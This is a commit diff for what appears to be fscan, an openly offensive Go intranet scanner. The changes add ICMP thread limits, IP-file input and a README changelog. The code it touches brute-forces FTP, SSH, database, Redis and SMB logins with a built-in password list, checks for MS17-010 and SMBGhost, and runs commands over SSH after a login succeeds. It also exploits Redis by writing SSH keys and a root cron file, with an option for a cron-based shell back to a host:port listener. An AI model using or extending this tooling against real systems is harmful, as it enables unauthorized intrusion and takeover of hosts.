update icmp threads

update
2026-02-09 18:29:17 +08:00 · 2020-11-16 19:55:11 +08:00 · 2020-11-16 19:55:00 +08:00 · 2020-11-16 13:17:59 +08:00 · 2020-11-16 09:51:41 +08:00 · 2020-11-15 23:36:53 +08:00
21 changed files with 194 additions and 198 deletions
--- a/Plugins/base.go
+++ b/Plugins/base.go
@@ -14,39 +14,5 @@ var PluginList = map[string]interface{}{
 	"27017":MongodbScan,
 	"1000001": MS17010,
 	"1000002": SmbGhost,
-	//"WebTitle":WebTitle,
+	"1000003":WebTitle,
 }
-
-//var Passwords = []string{"admin123A","123456","admin","root","password","123123","123","1","{user}","{user}{user}","{user}1","{user}123","{user}2016","{user}2015","{user}!","","P@ssw0rd!!","qwa123","12345678","test","123qwe!@#","123456789","123321","1314520","666666","woaini","fuckyou","000000","1234567890","8888888","qwerty","1qaz2wsx","abc123","abc123456","1q2w3e4r","123qwe","p@ssw0rd","p@55w0rd","password!","p@ssw0rd!","password1","r00t","tomcat","apache","system","huawei","admin123","zte"}
-//const Username = "admin"
-//const Password = "123456"
-//const Timeout = 3 * time.Second
-//const FTPPORT = 21
-//const SSHPORT = 22
-//const MEMCACHEDPORT = 11211
-//const MONGODBPORT  = 27017
-//const MSSQLPORT = 1433
-//const OraclePORT = 1433
-//const PSQLPORT = 5432
-//const REDISPORT = 6379
-//const MYSQLPORT  = 3306
-//const SMBPORT = 445
-//const POSTGRESPORT = 5432
-
-
-//var PluginList = map[string]interface{}{
-//	"ftp": FtpScan,
-//	"mysql": MysqlScan,
-//	//"mongodb":MgoConn,
-//	"mssql":MssqlScan,
-//	"redis": RedisScan,
-//	//"smb": SmbScan,
-//	"ssh": SshScan,
-//	//"portscan": PortConn,
-//	//"icmp": IcmpConn,
-//	"postgresql": PostgresScan,
-//	//"urlscan":UrlConn,
-//	//"auth":ApacheConn,
-//	//"subdomain":SDConn,
-//	//"memcached":MemConn,
-//}
--- a/Plugins/elasticsearch.go
+++ b/Plugins/elasticsearch.go
@@ -51,21 +51,4 @@ func geturl2(info *common.HostInfo) (flag bool,err error) {
 		}
 	}
 	return flag,err
-
-	//fmt.Print("\n")
 }
-
-
-//if info.Cookie!=""{
-//	res.Header.Add("Cookie",info.Cookie)
-//}
-//if info.Header!=""{
-//	var header = make(map[string]string)
-//	err:=json.Unmarshal([]byte(info.Header),&header)
-//	if err!=nil{
-//		Misc.CheckErr(err)
-//	}
-//	for k,v:=range header{
-//		res.Header.Add(k,v)
-//	}
-//}
--- a/Plugins/findnet.go
+++ b/Plugins/findnet.go
@@ -70,7 +70,6 @@ func read(text []byte,host string)  {
 			return
 		}
 		result += "\n   [->]"+string(host)
-		//result += "\n   ["+string(host)+"]"
 	}
 	common.LogSuccess(result)
 }
--- a/Plugins/ftp.go
+++ b/Plugins/ftp.go
@@ -14,7 +14,7 @@ func FtpScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
 	for _,user:=range common.Userdict["ftp"]{
 		for _,pass:=range common.Passwords{
 			pass = strings.Replace(pass, "{user}", string(user), -1)
-			flag,err := FtpConn(info,user,pass,ch,wg)
+			flag,err := FtpConn(info,user,pass)
 			if flag==true && err==nil {
 				break Loop
 			}
@@ -24,7 +24,7 @@ func FtpScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
 	<- ch
 }

-func FtpConn(info *common.HostInfo,user string,pass string,ch chan int,wg *sync.WaitGroup)(flag bool,err error){
+func FtpConn(info *common.HostInfo,user string,pass string)(flag bool,err error){
 	flag = false
 	Host,Port,Username,Password := info.Host, common.PORTList["ftp"],user, pass
 	conn, err := ftp.DialTimeout(fmt.Sprintf("%v:%v",Host,Port), time.Duration(info.Timeout)*time.Second)
--- a/Plugins/icmp.go
+++ b/Plugins/icmp.go
@@ -71,7 +71,7 @@ func isping(ip string) bool {
 	buffer.Reset()
 	binary.Write(&buffer, binary.BigEndian, icmp)

-	Time, _ := time.ParseDuration("2s")
+	Time, _ := time.ParseDuration("3s")
 	conn, err := net.DialTimeout("ip4:icmp", ip, Time)
 	if err != nil {
 		return false
@@ -80,7 +80,7 @@ func isping(ip string) bool {
 	if err != nil {
 		return false
 	}
-	conn.SetReadDeadline(time.Now().Add(time.Second * 2))
+	conn.SetReadDeadline(time.Now().Add(time.Second * 3))
 	num, err := conn.Read(recvBuf)
 	if err != nil {
 		return false
@@ -115,11 +115,13 @@ func CheckSum(data []byte) uint16 {
 	return uint16(^sum)
 }

-func IcmpCheck(hostslist []string) {
+func IcmpCheck(hostslist []string,IcmpThreads int) {
 	var wg sync.WaitGroup
 	mutex := &sync.Mutex{}
+	limiter := make(chan int, IcmpThreads)
 	for _,host :=range hostslist{
 		wg.Add(1)
+		limiter <- 1
 		go func(host string) {
 			defer wg.Done()
 			if isping(host){
@@ -127,11 +129,14 @@ func IcmpCheck(hostslist []string) {
 				AliveHosts = append(AliveHosts, host)
 				mutex.Unlock()
 			}
+			<- limiter
 		}(host)
+
 	}
 	wg.Wait()
 }

+
 func ExecCommandPing(ip string,bsenv string) bool {
 	command := exec.Command(bsenv, "-c", "ping -c 1 -w 1 "+ip+" >/dev/null && echo true || echo false")  //ping -c 1 -i 0.5 -t 4 -W 2 -w 5 "+ip+" >/dev/null && echo true || echo false"
 	outinfo := bytes.Buffer{}
@@ -156,12 +161,6 @@ func PingCMDcheck(hostslist []string,bsenv string) {
 	var wg sync.WaitGroup
 	mutex := &sync.Mutex{}
 	limiter := make(chan struct{}, 40)
-	//aliveHost := make(chan string, 20)
-	//go func() {
-	//	for s := range aliveHost {
-	//		fmt.Println(s)
-	//	}
-	//}()
 	for _,host :=range hostslist{
 		wg.Add(1)
 		limiter <- struct{}{}
@@ -177,24 +176,23 @@ func PingCMDcheck(hostslist []string,bsenv string) {
 		}(host)
 	}
 	wg.Wait()
-	//close(aliveHost)
 }

-func ICMPRun(hostslist []string)  []string{
+func ICMPRun(hostslist []string,IcmpThreads int)  []string{
 	var sysinfo SystemInfo
 	sysinfo = GetSys()

 	if sysinfo.OS == "windows" {
-		IcmpCheck(hostslist)
+		IcmpCheck(hostslist,IcmpThreads)
 	}else if sysinfo.OS == "linux" {
 		if (sysinfo.Groupid == "0" || sysinfo.Userid == "0" || sysinfo.Username == "root") {
-			IcmpCheck(hostslist)
+			IcmpCheck(hostslist,IcmpThreads)
 		}else {
 			PingCMDcheck(hostslist,"/bin/bash")
 		}
 	}else if sysinfo.OS == "darwin" {
 		if (sysinfo.Groupid == "0" || sysinfo.Userid == "0" || sysinfo.Username == "root") {
-			IcmpCheck(hostslist)
+			IcmpCheck(hostslist,IcmpThreads)
 		}else {
 			PingCMDcheck(hostslist,"/usr/local/bin/bash")
 		}
--- a/Plugins/ms17017.go
+++ b/Plugins/ms17017.go
@@ -131,7 +131,7 @@ func MS17010Scan(info *common.HostInfo) {
 		}

 	} else {
-		result := fmt.Sprintf("%s\t        \t(%s)\n", ip, os)
+		result := fmt.Sprintf("%s  (%s)", ip, os)
 		common.LogSuccess(result)
 	}

--- a/Plugins/mssql.go
+++ b/Plugins/mssql.go
@@ -17,8 +17,8 @@ func MssqlScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
 Loop:
 	for _,user:=range common.Userdict["mssql"]{
 		for _,pass:=range common.Passwords{
-			pass = strings.Replace(pass, "{user}", string(user), -1)
-			flag,err := MssqlConn(info,user,pass,ch,wg)
+			pass = strings.Replace(pass, "{user}", user, -1)
+			flag,err := MssqlConn(info,user,pass)
 			if flag==true && err==nil {
 				break Loop
 			}
@@ -28,7 +28,7 @@ Loop:
 	<- ch
 }

-func MssqlConn(info *common.HostInfo,user string,pass string,ch chan int,wg *sync.WaitGroup)(flag bool,err error){
+func MssqlConn(info *common.HostInfo,user string,pass string)(flag bool,err error){
 	flag = false
 	Host,Port,Username,Password := info.Host, common.PORTList["mssql"],user, pass
 	dataSourceName := fmt.Sprintf("server=%s;user id=%s;password=%s;port=%d;encrypt=disable;timeout=%d", Host,Username,Password,Port,time.Duration(info.Timeout)*time.Second)
--- a/Plugins/mysql.go
+++ b/Plugins/mysql.go
@@ -16,8 +16,8 @@ func MysqlScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
 Loop:
 	for _,user:=range common.Userdict["mysql"]{
 		for _,pass:=range common.Passwords{
-			pass = strings.Replace(pass, "{user}", string(user), -1)
-			flag,err := MysqlConn(info,user,pass,ch,wg)
+			pass = strings.Replace(pass, "{user}", user, -1)
+			flag,err := MysqlConn(info,user,pass)
 			if flag==true && err==nil {
 				break Loop
 			}
@@ -27,7 +27,7 @@ Loop:
 	<- ch
 }

-func MysqlConn(info *common.HostInfo,user string,pass string,ch chan int,wg *sync.WaitGroup)(flag bool,err error){
+func MysqlConn(info *common.HostInfo,user string,pass string)(flag bool,err error){
 	flag = false
 	Host,Port,Username,Password := info.Host, common.PORTList["mysql"],user, pass
 	dataSourceName := fmt.Sprintf("%v:%v@tcp(%v:%v)/%v?charset=utf8", Username, Password, Host,Port, "mysql")
--- a/Plugins/postgres.go
+++ b/Plugins/postgres.go
@@ -15,7 +15,7 @@ Loop:
 	for _,user:=range common.Userdict["postgresql"]{
 		for _,pass:=range common.Passwords{
 			pass = strings.Replace(pass, "{user}", string(user), -1)
-			flag,err := PostgresConn(info,user,pass,ch,wg)
+			flag,err := PostgresConn(info,user,pass)
 			if flag==true && err==nil {
 				break Loop
 			}
@@ -25,7 +25,7 @@ Loop:
 	<- ch
 }

-func PostgresConn(info *common.HostInfo,user string,pass string,ch chan int,wg *sync.WaitGroup)(flag bool,err error){
+func PostgresConn(info *common.HostInfo,user string,pass string)(flag bool,err error){
 	flag = false
 	Host,Port,Username,Password := info.Host, common.PORTList["psql"],user, pass
 	dataSourceName := fmt.Sprintf("postgres://%v:%v@%v:%v/%v?sslmode=%v", Username, Password, Host,Port, "postgres", "disable")
--- a/Plugins/redis.go
+++ b/Plugins/redis.go
@@ -22,7 +22,7 @@ func RedisScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
 Loop:
 		for _,pass:=range common.Passwords{
 			pass = strings.Replace(pass, "{user}", string("redis"), -1)
-			flag,err := RedisConn(info,pass,ch,wg)
+			flag,err := RedisConn(info,pass)
 			if flag==true && err==nil {
 				break Loop
 			}
@@ -31,7 +31,7 @@ Loop:
 	<- ch
 }

-func RedisConn(info *common.HostInfo,pass string,ch chan int,wg *sync.WaitGroup)(flag bool,err error){
+func RedisConn(info *common.HostInfo,pass string)(flag bool,err error){
 	flag = false
 	realhost:=fmt.Sprintf("%s:%d",info.Host,common.PORTList["redis"])
 	conn,err := net.DialTimeout("tcp",realhost,time.Duration(info.Timeout)*time.Second)
@@ -41,7 +41,6 @@ func RedisConn(info *common.HostInfo,pass string,ch chan int,wg *sync.WaitGroup)
 	defer conn.Close()
 	conn.Write([]byte(fmt.Sprintf("auth %s\r\n",pass)))
 	reply,err := readreply(conn)
-	//common.LogSuccess(result)
 	if strings.Contains(reply,"+OK"){
 		result := fmt.Sprintf("Redis:%s %s",realhost,pass)
 		common.LogSuccess(result)
@@ -82,7 +81,7 @@ func Expoilt(info *common.HostInfo,realhost string,conn net.Conn)  {
 				result := fmt.Sprintf("%v SSH public key was written successfully",realhost)
 				common.LogSuccess(result)
 			}else {
-				fmt.Println(realhost,"SSHPUB write failed",text)
+				fmt.Println("Redis:",realhost,"SSHPUB write failed",text)
 			}
 		}
 	}
@@ -95,7 +94,7 @@ func Expoilt(info *common.HostInfo,realhost string,conn net.Conn)  {
 				result := fmt.Sprintf("%v /var/spool/cron/root was written successfully",realhost)
 				common.LogSuccess(result)
 			}else {
-				fmt.Println(realhost,"cron write failed",text)
+				fmt.Println("Redis:",realhost,"cron write failed",text)
 			}
 		}
 	}
@@ -122,6 +121,7 @@ func writekey(conn  net.Conn,filename string) (flag bool,text string) {
 			}
 		}
 	}
+	text = strings.TrimSpace(text)
 	if len(text) > 50{
 		text = text[:50]
 	}
@@ -146,10 +146,11 @@ func writecron(conn  net.Conn,host string) (flag bool,text string) {
 				text,_ = readreply(conn)
 				if strings.Contains(text,"OK") {
 					flag = true
-				}
-			}
-		}
-	}
+				}//else {fmt.Println(text)}
+			}//else {fmt.Println(text)}
+		}//else {fmt.Println(text)}
+	}//else {fmt.Println(text)}
+	text = strings.TrimSpace(text)
 	if len(text) > 50{
 		text = text[:50]
 	}
@@ -164,10 +165,8 @@ func Readfile(filename string)(string,error){
 	}
 	defer file.Close()
 	scanner := bufio.NewScanner(file)
-	//scanner.Split(bufio.ScanLines)
 	for scanner.Scan() {
-		//text := strings.TrimSpace(scanner.Text())
-		text := scanner.Text()
+		text := strings.TrimSpace(scanner.Text())
 		if text != "" {
 			return text,nil
 		}
--- a/Plugins/scanner.go
+++ b/Plugins/scanner.go
@@ -15,7 +15,6 @@ func scan_func(m map[string]interface{}, name string, infos ...interface{}) (res
 		err = errors.New("The number of infos is not adapted.")
 		if err != nil {
 			fmt.Println(err.Error())
-		//	//os.Exit(0)
 		}
 	}
 	in := make([]reflect.Value, len(infos))
@@ -34,17 +33,18 @@ func IsContain(items []string, item string) bool {
 	return false
 }

-func Scan(info *common.HostInfo)  {
-	Hosts,_ :=  common.ParseIP(info.Host)
+func Scan(info common.HostInfo)  {
+	fmt.Println("scan start")
+	Hosts,_ :=  common.ParseIP(info.Host,info.HostFile)
 	if info.Isping == false{
-		Hosts =  ICMPRun(Hosts)
+		Hosts =  ICMPRun(Hosts,info.IcmpThreads)
 	}
 	_,AlivePorts := TCPportScan(Hosts,info.Ports,"icmp",3)   //return AliveHosts,AlivePorts
-	var severports  []string         	//severports := []string{"21","22","135"."445","1433","3306","5432","6379","9200","11211","27017"}
+	var severports  []string         	//severports := []string{"21","22","135"."445","1433","3306","5432","6379","9200","11211","27017"...}
 	for _,port:=range common.PORTList{
 		severports = append(severports,strconv.Itoa(port))
 	}
-	severports1 := []string{"1521"}
+	severports1 := []string{"1521"}  //no scan these service
 	var ch = make(chan int,info.Threads)
 	var wg = sync.WaitGroup{}
 	var scantype string
@@ -53,35 +53,29 @@ func Scan(info *common.HostInfo)  {
 		info.Host = scan_ip
 		if info.Scantype == "all"{
 			if IsContain(severports,scan_port){
-				//scantype = scan_port
 				AddScan(scan_port,info,ch,&wg)
 			}else {
 				if !IsContain(severports1,scan_port){
-					info.Url = fmt.Sprintf("http://%s",targetIP)
-					wg.Add(1)
-					go WebTitle(info,ch,&wg)  					//go scan_func(PluginList,"WebTitle",info,ch,&wg)
-					ch <- 1
+					info.Ports = scan_port
+					AddScan("1000003",info,ch,&wg) //webtitle
 				}
 			}
-			if scan_port == "445"{
+			if scan_port == "445"{   //scan more vul
 				AddScan("1000001",info,ch,&wg)
 				AddScan("1000002",info,ch,&wg)
 			}
-
 		}else {
-			port,_:=common.PORTList[info.Scantype]
+			port,_:=common.PORTList_bak[info.Scantype]
 			scantype = strconv.Itoa(port)
 			AddScan(scantype,info,ch,&wg)
-			//wg.Add(1)
-			//go scan_func(PluginList,scantype,info,ch,&wg)
-			//ch <- 1
 		}
 	}
 	wg.Wait()
 }

-func AddScan(scantype string,info *common.HostInfo,ch chan int,wg *sync.WaitGroup)  {
+func AddScan(scantype string,info common.HostInfo,ch chan int,wg *sync.WaitGroup)  {
 	wg.Add(1)
-	go scan_func(PluginList,scantype,info,ch,wg)
+	if info.Scantype == "webtitle"{scantype = "1000003"}
+	go scan_func(PluginList,scantype,&info,ch,wg)
 	ch <- 1
 }
--- a/Plugins/smb.go
+++ b/Plugins/smb.go
@@ -15,10 +15,7 @@ Loop:
 	for _,user:=range common.Userdict["smb"]{
 		for _,pass:=range common.Passwords{
 			pass = strings.Replace(pass, "{user}", string(user), -1)
-			//fmt.Println(user,pass)
-			//flag,err := SmblConn(info,user,pass)
 			flag,err := doWithTimeOut(info,user,pass)
-			//fmt.Println(user,pass,flag,err)
 			if flag==true && err==nil {
 				break Loop
 			}
@@ -39,12 +36,10 @@ func SmblConn(info *common.HostInfo,user string,pass string)(flag bool,err error
 		Password:    Password,
 		Domain:      "",
 		Workstation: "",
-		Timeout:     info.Timeout,

 	}

 	session, err := smb.NewSession(options, false)
-	//fmt.Println(err)
 	if err == nil {
 		defer session.Close()
 		if session.IsAuthenticated {
@@ -58,7 +53,6 @@ func SmblConn(info *common.HostInfo,user string,pass string)(flag bool,err error

 func doWithTimeOut(info *common.HostInfo,user string,pass string)(flag bool,err error){
 	ctx,cancel := context.WithTimeout(context.Background(),time.Duration(info.Timeout)*time.Second)
-	//ctx,cancel := context.WithTimeout(context.Background(),1*time.Second)
 	defer cancel()
 	signal := make(chan int,1)
 	go func() {
--- a/Plugins/ssh.go
+++ b/Plugins/ssh.go
@@ -10,18 +10,11 @@ import (
 	"time"
 )
 func SshScan(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) {
-	//SshConn(info,"oracle","oracle",ch,wg)
 Loop:
 	for _,user:=range common.Userdict["ssh"]{
 		for _,pass:=range common.Passwords{
-			pass = strings.Replace(pass, "{user}", string(user), -1)
-			//wg.Add(1)
-			//var good bool
-			//go SshConn(info,user,pass,ch,wg)
-			//if good == true{
-			//	break Loop
-			//}
-			flag,err := SshConn(info,user,pass,ch,wg)
+			pass = strings.Replace(pass, "{user}", user, -1)
+			flag,err := SshConn(info,user,pass)
 			if flag==true && err==nil {
 				break Loop
 			}
@@ -31,10 +24,9 @@ Loop:
 	<- ch
 }

-func SshConn(info *common.HostInfo,user string,pass string,ch chan int,wg *sync.WaitGroup)(flag bool,err error){
+func SshConn(info *common.HostInfo,user string,pass string)(flag bool,err error){
 	flag = false
 	Host,Port,Username,Password := info.Host, common.PORTList["ssh"],user, pass
-	//fmt.Println(Host,Port,Username,Password)
 	config := &ssh.ClientConfig{
 		User: Username,
 		Auth: []ssh.AuthMethod{
@@ -50,7 +42,7 @@ func SshConn(info *common.HostInfo,user string,pass string,ch chan int,wg *sync.
 	if err == nil {
 		defer client.Close()
 		session, err := client.NewSession()
-		if err == nil  { //if err == nil && errRet == nil {
+		if err == nil  {
 			defer session.Close()
 			flag = true
 			if info.Command != ""{
--- a/Plugins/webtitle.go
+++ b/Plugins/webtitle.go
@@ -12,6 +12,7 @@ import (
 )

 func WebTitle(info *common.HostInfo,ch chan int,wg *sync.WaitGroup) (err error, result string) {
+	info.Url = fmt.Sprintf("http://%s:%s",info.Host,info.Ports)
 	err,result = geturl(info)
    wg.Done()
 	<-ch
@@ -36,13 +37,13 @@ func geturl(info *common.HostInfo) (err error, result string) {
 			body, _ := ioutil.ReadAll(resp.Body)
 			re :=regexp.MustCompile("<title>(.*)</title>")
 			find := re.FindAllStringSubmatch(string(body),-1)
-			if len(find) > 1{
+			if len(find) > 0{
 				title = find[0][1]
 			}else {
 				title = "None"
 			}
-			if len(title) > 20{
-				title = title[:20]
+			if len(title) > 50{
+				title = title[:50]
 			}
 			if resp.StatusCode == 400 &&  string(url[5]) != "https"{
 				info.Url = strings.Replace(url, "http://", "https://", 1)
@@ -55,8 +56,6 @@ func geturl(info *common.HostInfo) (err error, result string) {
 		}
 	}
 	return err, ""
-
-	//fmt.Print("\n")
 }
 //var client = &http.Client{
 //	Transport:&http.Transport{
--- a/README.md
+++ b/README.md
@@ -13,6 +13,9 @@
 答：  
   因为用习惯了f-scrack，习惯一条命令跑完所有模块，省去一个个模块单独调用的时间，当然我附加了-m 指定模块的功能。

+## 最近更新
+[+] 2020/11/16 对icmp模块进行优化,增加-it 参数(IcmpThreads),默认3000,适合扫B段  
+[+] 2020/11/15 支持ip以文件导入,-hs ip.txt,并对去重做了处理

 ## usege
 简单用法
@@ -25,6 +28,13 @@ fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后，命令执行)
 fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)
 fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
 ```
+```
+-h 192.168.1.1/24 (C段)  
+-h 192.168.1.1/16 (B段)
+-h 192.168.1.1/8  (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
+-hf ip.txt  (以文件导入)
+```
+

 完整参数
 ```
@@ -32,6 +42,10 @@ fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
        exec command (ssh)
  -h string
        IP address of the host you want to scan,for example: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12
+  -hf string
+        host file, -hs ip.txt
+  -it int
+        Icmp Threads nums (default 3000)
  -m string
        Select scan type ,as: -m ssh (default "all")
  -no
@@ -51,29 +65,35 @@ fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
  -rs string
        redis shell to write cron file (as: -rs 192.168.1.1:6666)
  -t int
-        Thread nums (default 100)
+        Thread nums (default 200)
  -time int
        Set timeout (default 3)
  -user string
        username
  -userf string
        username file
+
 ```

+## 运行截图

-`fscan.exe -h 192.168.x.x`
+`fscan.exe -h 192.168.x.x  (全功能、ms17010、读取网卡信息)`
 ![](image/1.png)

+![](image/4.png)
+
 `fscan.exe -h 192.168.x.x -rf id_rsa.pub (redis 写私钥)`
 ![](image/2.png)

-
 `fscan.exe -h 192.168.x.x -c "whoami;id" (ssh 命令)`
 ![](image/3.png)


-`fscan.exe -h 192.168.x.x (ms17010、读取网卡信息)`
-![](image/4.png)
+## 未来计划
+[*] 合理输出当前扫描进度  
+[*] 增加内网常见高危漏洞  
+[*] 增加高危web漏洞扫描  
+[*] 师傅们觉得有必要加的漏洞，也可以提issue  


 ## 参考链接
--- a/common/Parse.go
+++ b/common/Parse.go
@@ -74,7 +74,7 @@ func Readfile(filename string)([]string,error){
 	file, err := os.Open(filename)
 	if err!=nil{
 		fmt.Println("Open %s error, %v", filename,err)
-		return nil,err
+		os.Exit(0)
 	}
 	defer file.Close()
 	var content []string
@@ -92,7 +92,7 @@ func Readfile(filename string)([]string,error){


 func ParseInput(Info *HostInfo){
-	if Info.Host==""{
+	if Info.Host=="" && Info.HostFile ==""{
 		fmt.Println("Host is none")
 		flag.Usage()
 		os.Exit(0)
@@ -123,4 +123,12 @@ func ParseScantype(Info *HostInfo){
 			PORTList[name] = ScanPort
 		}
 	}
+}
+
+
+func CheckErr(text string,err error){
+	if err!=nil{
+		fmt.Println(text,err.Error())
+		os.Exit(0)
+	}
 }
--- a/common/ParseIP.go
+++ b/common/ParseIP.go
@@ -1,21 +1,57 @@
 package common

 import (
+	"bufio"
 	"errors"
+	"fmt"
 	"net"
+	"os"
 	"regexp"
 	"strconv"
 	"strings"
 )

-var ParseIPErr error =errors.New("host parsing error\n" +
+var ParseIPErr  =errors.New("host parsing error\n" +
 	"format: \n"+
-	"192.168.1.1/24\n"+
 	"192.168.1.1\n" +
+	"192.168.1.1/8\n"+
+	"192.168.1.1/16\n"+
+	"192.168.1.1/24\n"+
 	"192.168.1.1,192.168.1.2\n" +
 	"192.168.1.1-255")

-func ParseIP(ip string)([]string,error){
+func ParseIP(ip string,filename string)(hosts []string,err error){
+
+	if ip != ""{
+		hosts,err = ParseIPs(ip)
+	}
+	if filename != ""{
+		var filehost []string
+		filehost,_ = Readipfile(filename)
+		hosts = append(hosts,filehost...)
+	}
+	hosts = RemoveDuplicate(hosts)
+	return hosts,err
+}
+
+func ParseIPs(ip string)(hosts []string,err error){
+	if strings.Contains(ip,","){
+		IPList:=strings.Split(ip,",")
+		var ips []string
+		for _,ip:=range IPList{
+			ips,err = ParseIPone(ip)
+			CheckErr(ip,err)
+			hosts = append(hosts,ips...)
+		}
+		return hosts,err
+	}else {
+		hosts,err = ParseIPone(ip)
+		CheckErr(ip,err)
+		return hosts,err
+	}
+}
+
+func ParseIPone(ip string)([]string,error){
 	reg:=regexp.MustCompile(`[a-zA-Z]+`)
 	switch {
 	case strings.Contains(ip[len(ip)-3:len(ip)],"/24"):
@@ -24,8 +60,6 @@ func ParseIP(ip string)([]string,error){
 		return ParseIPD(ip)
 	case strings.Contains(ip[len(ip)-2:len(ip)],"/8"):
 		return ParseIPE(ip)
-	case strings.Contains(ip,","):
-		return ParseIPB(ip)
 	case strings.Count(ip,"-")==1:
 		return ParseIPC(ip)
 	case reg.MatchString(ip):
@@ -42,7 +76,6 @@ func ParseIP(ip string)([]string,error){
 		return []string{ip},nil
 	}
 }
-
 //Parsing CIDR IP
 func ParseIPA(ip string)([]string,error){
 	realIP:=ip[:len(ip)-3]
@@ -128,4 +161,39 @@ func ParseIPE(ip string)([]string,error){
 		}
 	}
 	return AllIP,nil
-}
+}
+
+func Readipfile(filename string)([]string,error){
+	file, err := os.Open(filename)
+	if err!=nil{
+		fmt.Println("Open %s error, %v", filename,err)
+		os.Exit(0)
+	}
+	defer file.Close()
+	var content []string
+	scanner := bufio.NewScanner(file)
+	scanner.Split(bufio.ScanLines)
+	for scanner.Scan() {
+		text := strings.TrimSpace(scanner.Text())
+		if text != "" {
+			host,err := ParseIPs(text)
+			CheckErr(text,err)
+			content=append(content,host...)
+		}
+	}
+	return content,nil
+}
+
+
+func RemoveDuplicate(old []string) ([]string) {
+	result := make([]string, 0, len(old))
+	temp := map[string]struct{}{}
+	for _, item := range old {
+		if _, ok := temp[item]; !ok {
+			temp[item] = struct{}{}
+			result = append(result, item)
+		}
+	}
+	return result
+}
+
--- a/common/config.go
+++ b/common/config.go
@@ -25,10 +25,28 @@ var PORTList = map[string]int{
 	"smb": 445,
 	"ms17010": 1000001,
 	"cve20200796":1000002,
+	"webtitle": 1000003,
+	"elastic": 9200,
+	"findnet": 135,
+	"all":0,
+}
+
+var PORTList_bak = map[string]int{
+	"ftp": 21,
+	"ssh": 22,
+	"mem": 11211,
+	"mgo": 27017,
+	"mssql": 1433,
+	"psql": 5432,
+	"redis": 6379,
+	"mysql": 3306,
+	"smb": 445,
+	"ms17010": 1000001,
+	"cve20200796":1000002,
+	"webtitle": 1000003,
 	"elastic": 9200,
 	"findnet": 135,
 	"all":0,
-	//"wenscan": 17010,
 }

 var Outputfile = "result.txt"
@@ -39,12 +57,14 @@ var DefaultPorts = "21,22,23,80,135,443,445,1433,1521,3306,5432,6379,7001,8080,8

 type HostInfo struct {
 	Host string
+	HostFile string
 	Ports string
 	Url string
 	Timeout int64
 	Scantype string
 	Isping bool
 	Threads int
+	IcmpThreads int
 	Command string
 	Username string
 	Password string
@@ -59,49 +79,3 @@ type HostInfo struct {
 }


-
-
-
-//var Passwords = []string{"admin123A","123456","admin","root","password","123123","123","1","{user}","{user}{user}","{user}1","{user}123","{user}2016","{user}2015","{user}!","","P@ssw0rd!!","qwa123","12345678","test","123qwe!@#","123456789","123321","1314520","666666","woaini","fuckyou","000000","1234567890","8888888","qwerty","1qaz2wsx","abc123","abc123456","1q2w3e4r","123qwe","p@ssw0rd","p@55w0rd","password!","p@ssw0rd!","password1","r00t","tomcat","apache","system","huawei","admin123","zte"}
-//const Username = "admin"
-//const Password = "123456"
-//const Timeout = 3 * time.Second
-//const FTPPORT = 21
-//const SSHPORT = 22
-//const MEMCACHEDPORT = 11211
-//const MONGODBPORT  = 27017
-//const MSSQLPORT = 1433
-//const OraclePORT = 1433
-//const PSQLPORT = 5432
-//const REDISPORT = 6379
-//const MYSQLPORT  = 3306
-//const SMBPORT = 445
-//const POSTGRESPORT = 5432
-
-//var Userdict = map[string][]string{
-//	"ftp":  []string{"www","admin","root","db","wwwroot","data","web","ftp"},
-//	"mysql": []string{"root"},
-//	"mssql": []string{"root","sa"},
-//	"smb": []string{"administrator","guest"},
-//	"postgresql": []string{"postgres","admin"},
-//	"ssh": []string{"root","admin"},
-//	"mongodb": []string{"root","admin"},
-//	//"telnet": []string{"administrator","admin","root","cisco","huawei","zte"},
-//}
-
-//var PluginList = map[string]interface{}{
-//	"ftp": FtpScan,
-//	"mysql": MysqlScan,
-//	//"mongodb":MgoConn,
-//	"mssql":MssqlScan,
-//	"redis": RedisScan,
-//	//"smb": SmbScan,
-//	"ssh": SshScan,
-//	//"portscan": PortConn,
-//	//"icmp": IcmpConn,
-//	"postgresql": PostgresScan,
-//	//"urlscan":UrlConn,
-//	//"auth":ApacheConn,
-//	//"subdomain":SDConn,
-//	//"memcached":MemConn,
-//}
--- a/common/flag.go
+++ b/common/flag.go
@@ -22,9 +22,11 @@ func Banner(){
 func Flag(Info *HostInfo)  {
 	Banner()
 	flag.StringVar(&Info.Host,"h","","IP address of the host you want to scan,for example: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12")
+	flag.StringVar(&Info.HostFile,"hf","","host file, -hs ip.txt")
 	flag.StringVar(&Info.Ports,"p",DefaultPorts,"Select a port,for example: 22 | 1-65535 | 22,80,3306")
 	flag.StringVar(&Info.Command,"c","","exec command (ssh)")
-	flag.IntVar(&Info.Threads,"t",100,"Thread nums")
+	flag.IntVar(&Info.Threads,"t",200,"Thread nums")
+	flag.IntVar(&Info.IcmpThreads,"it",3000,"Icmp Threads nums")
 	flag.BoolVar(&Info.Isping,"np",false,"not to ping")
 	flag.BoolVar(&Info.IsSave,"no",false,"not to save output log")
 	flag.StringVar(&Info.Username,"user","","username")
@@ -35,6 +37,6 @@ func Flag(Info *HostInfo)  {
 	flag.Int64Var(&Info.Timeout,"time",3,"Set timeout")
 	flag.StringVar(&Info.Scantype,"m","all","Select scan type ,as: -m ssh")
 	flag.StringVar(&Info.RedisFile,"rf","","redis file to write sshkey file (as: -rf id_rsa.pub) ")
-	flag.StringVar(&Info.RedisFile,"rs","","redis shell to write cron file (as: -rs 192.168.1.1:6666) ")
+	flag.StringVar(&Info.RedisShell,"rs","","redis shell to write cron file (as: -rs 192.168.1.1:6666) ")
 	flag.Parse()
 }
--- a/common/log.go
+++ b/common/log.go
@@ -17,7 +17,7 @@ func LogSuccess(result string){
 }
 func WriteFile(result string,filename string)  {
 	var text = []byte(result+"\n")
